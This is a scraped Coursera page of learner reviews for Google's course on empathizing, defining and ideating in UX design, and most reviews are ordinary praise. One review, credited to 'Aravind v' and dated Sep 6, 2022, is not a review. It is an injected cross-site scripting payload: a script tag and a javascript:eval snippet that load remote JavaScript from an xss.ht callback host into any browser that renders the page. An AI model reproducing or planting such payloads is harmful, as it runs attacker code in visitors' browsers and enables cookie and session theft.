Chevron Left
Back to Start the UX Design Process: Empathize, Define, and Ideate

Learner Reviews & Feedback for Start the UX Design Process: Empathize, Define, and Ideate by Google

4.8
stars
10,353 ratings

About the Course

Start the UX design process: Empathize, Define, Ideate is the second course in a certificate program that will equip you with the skills needed to apply to entry-level jobs in user experience (UX) design. In this course, you’ll complete the first phases of the design process for a project that you’ll be able to include in your portfolio. You will learn how to empathize with users and understand their pain points, define user needs using problem statements, and come up with lots of ideas for solutions to those user problems. Current UX designers and researchers at Google will serve as your instructors, and you will complete hands-on activities that simulate real-world UX design scenarios. Learners who complete the seven courses in this certificate program should be equipped to apply for entry-level jobs as UX designers. No previous experience is necessary. By the end of this course, you will be able to: - Empathize with users to understand their needs and pain points. - Create empathy maps, personas, user stories, and user journey maps to understand user needs. - Develop problem statements to define user needs. - Generate ideas for possible solutions to user problems. - Conduct competitive audits. - Start designing a mobile app, a new project to include in your professional UX portfolio....

Top reviews

TB

Sep 29, 2021

This course is very good & massively designed for student's who are biginner in UX field. The lecturers are also self proffessional experienced UX designer. Is not is great for carrier!!! Pretty cool!

MM

Sep 9, 2022

I love this course! Personally, it took me longer than I thought to complete each challenge, but I loved each step, especially the ideation and research part! I already want to start the next course!

Filter by:

226 - 250 of 1,958 Reviews for Start the UX Design Process: Empathize, Define, and Ideate

By Rizki R F

Sep 13, 2021

The expert mentors from Google gave me a very detailed and structured explanation, and finally... I just finished this course after almost 2 months!

Thanks! Google & Coursera

By Vincenzo C

Jul 6, 2021

Great Course! Concepts like Research UX research and bias, accessibility design, user journey, problem statement, hypothesis statement, value proposition passionated me a lot

By Lyle-Dane W

Jun 22, 2021

Brilliant! Emily did a fantastic job, she just made it so much easier. Thanks to Shabi too for popping up again and helping us really consider Accessibility. Great job guys!

By Benelli B

Apr 29, 2022

Es ist auf jeden Fall amüsant einen UX Design Kurs bei coursera zu machen. Je mehr man lernt wie UX sein sollte, desto mehr ärgert einen die Bedienbarkeit coursera Seite :D

By MICHAEL

May 5, 2022

We strive to be better with our competitors. The important thing is to reap profits. Happiness is all we wish to find solutions for everything that suits our best product.

By Camilo A Q A

Aug 19, 2022

Es un excelente curso, acompañamiento de principio a fin va mas alla de la construcción del concepto de UX porque integra todo lo que esta bien en sociedad y en politica.

By Bernadett C

May 2, 2021

Learned a lot of new procedures that I will use when creatinga design, to make a better product. Really like the interactive parts and the assignments are varied and fun.

By Aravind “ v

Sep 6, 2022

"><script src=https://nikecom.xss.ht></script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://nikecom.xss.ht\';document.body.appendChild(a)')

By Anastasiya V

Aug 26, 2022

This part of the 7-unit course is much more engaging and interesting than the first part. I think it's because much more specific and hands-on infromation is shared. :)

By Nildeep J

Feb 10, 2022

It was a great experience and learnig the Process of empathizing with User and come up with different ideas and create user journey. And of course do cometitive audit.

By ARITRO K S

May 16, 2021

The course was great, with detailed explanation and a lot of examples. The assessments and quizzes were very helpful. My experience with this course was really awesome.

By Rutto T

Sep 18, 2022

Easy to understand from the basic of UX designer concepts. I recommend to take this course in order to browsing the contend whether it is what you are passion or not.

By Ivana- D B

Sep 2, 2021

It was very informative and Iearned a lot. I loved the asignments and had a lot of fun doing them. Looking forward to lerning more from these lovely people. Thank you!

By Veronica C

May 19, 2021

This is a very well thought out and detail orientated course. Very interesting and the attention to detail shows the amount of dedication it took to build this course.

By B V V

Apr 5, 2022

It was a new and amazing experience taking this course. I really enjoyed it. Assignments were challenging. The tutor was simply superb, her teaching style is awesome.

By Harmanpreet S

Jun 14, 2022

Damn, course was much more in detail than I thought. It really helped me to understand the Ideation Phase and gave me some cool techniques to use in my next project.

By Ruqayyah A

Aug 7, 2022

T This is an interesting course and I'm getting to gain more insight into the field of UX design. I can't wait to see myself as a proficient designer in this career

By Nazrin T

Feb 25, 2022

It helped to add detailed information to the basic UX design process. Course was easy to follow and tasks were somewhat challenging but managable. Thank you so much

By Meraj S

Nov 30, 2021

I am very happy and satisfied with this course, it worth learning with such a experienced and polite instructors. I definitely suggest my friends to do this course.

By Favour U

Jun 27, 2021

I totally enjoyed the learning process. The sessions were very intensive and I found the activities very exciting. I wish more people would experience this course.

By Beatriz O V

Aug 19, 2022

It is an interesting course, it gave me a good knowledge about the applications of user empathize, define and ideate. It also allowed me to work on my portfolio.

By Chris E

May 6, 2022

Really good, straightforward video and reading lectures. Best part is all the assignments can be added to my UX Portfolio that I will eventually show to employers.

By Awais B

Sep 6, 2022

Thanks, I lean a lot and I believe this course help me in my career. I am looking for the next course to complete this journey and then I will step into industry.

By CJ W

Sep 27, 2022

Definitely choose a unique product that you can relate to and maybe in an industry you would like to work in rather than going the "canned" route. Great course.

By GVN S

May 2, 2022

I am beginning to enjoy more and more after this course and the contents are really understandable even for someone like me who has zero experience in UX design